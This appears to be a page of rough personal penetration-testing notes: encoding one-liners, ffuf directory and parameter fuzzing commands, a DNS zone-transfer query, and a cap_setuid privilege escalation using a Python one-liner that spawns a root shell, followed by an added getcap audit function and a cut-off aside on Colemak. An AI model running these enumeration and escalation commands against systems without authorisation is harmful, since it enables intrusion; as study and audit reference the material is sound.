base64
echo 'test' | base64
echo 'dGVzdAo=' | base64 -d
hex
echo 'test' | xxd -p
echo '746573740a' | xxd -p -r
rot13
echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Early ideas, rough notes, and exploratory thoughts. These notes are incomplete and may not make sense yet, but I've decided to shamelessly publish them because I've decided they could be useful.
ffuf commands
In each case, FUZZ is the placeholder for word replacement.
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/target_dir/FUZZ \
-e .txt,.html,.bak # etc
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://example.com/target_dir/FUZZ \
-recursion
POST parameter
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/example.php \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "y=FUZZ" \
-ic
GET parameter
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u 'http://example.com/example.php?x=FUZZ' \
-ic
You can request a DNS zone transfer with dig by using the axfr query type:
dig axfr @dns-server.com target.tld
This returns every DNS record for target.tld. Zone transfers are intended for copying all records from a primary to a secondary server and should only be allowed from trusted hosts, but misconfigured servers may permit unauthorised transfers, which gives full enumeration of the zone without brute forcing.
SecLists from https://github.com/danielmiessler/SecLists can be installed on Kali using apt:
apt install seclists
They’re installed into /usr/share/seclists/
getcap lists the file capabilities set on executables. The one that gives a way in is cap_setuid:
getcap -r / 2>/dev/null
If anything listed with cap_setuid is an interpreter you can script, you can use it to call setuid(0) and get a shell. Here’s a Python example:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
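As an added audit helper (not from the original notes), the function below takes the output of getcap -r / and prints only the binaries whose capability set includes cap_setuid, so a host can be checked for exactly the condition described above. It handles both the older getcap output style (/path = caps+ep) and the newer one (/path caps=ep); the sample input is constructed, not taken from a real host, and paths are assumed to contain no spaces.

```shell
#!/bin/sh
# find_setuid_caps: read getcap output on stdin, print paths granted cap_setuid.
# Works for both output styles getcap has used:
#   /usr/bin/python3 = cap_setuid+ep     (older)
#   /usr/bin/python3 cap_setuid=ep       (newer)
find_setuid_caps() {
    awk '
        {
            path = $1
            # everything after the path is the capability text
            caps = substr($0, length(path) + 1)
            # split capability names on space, comma, "=" and "+"
            n = split(caps, parts, /[ ,=+]+/)
            for (i = 1; i <= n; i++) {
                if (parts[i] == "cap_setuid") { print path; break }
            }
        }'
}

# Constructed sample getcap output (assumed, not captured from a real system).
SAMPLE='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.11 = cap_setuid+ep
/usr/bin/perl cap_setuid,cap_setgid=ep
/usr/sbin/arping cap_net_raw=ep'

# Run over the sample; on a live host use: getcap -r / 2>/dev/null | find_setuid_caps
printf '%s\n' "$SAMPLE" | find_setuid_caps
```

Only the two interpreter entries are reported; the ping and arping entries carry cap_net_raw and are ignored.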
Just over a year ago I decided to bite the bullet and try out colemak. I’ve been at it full time on my Corne, but still using qwerty on traditional keyboards.
My findings: